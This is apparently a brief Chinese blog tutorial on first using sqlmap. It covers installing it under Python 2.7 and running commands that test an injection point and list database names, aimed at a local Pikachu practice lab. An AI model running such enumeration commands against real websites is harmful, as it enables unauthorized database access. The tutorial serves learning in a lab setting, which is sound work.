sqlmap初使用

首先安装python2.7,将sqlmap文件夹添加到python2.7的根目录
在这里插入图片描述
创建快捷方式,安装sqlmap。详情可以百度。
在这里插入图片描述
打开sqlmap,输入python sqlmap.py -h.
在这里插入图片描述
检测注入点是否可用
C:\Python27\sqlmap>python sqlmap.py -u “网址”
在这里插入图片描述
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u “http://127.0.0.1:88/pikachu-master/vul/burteforce/bf_form.php” --dbs
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_40684306/article/details/89099608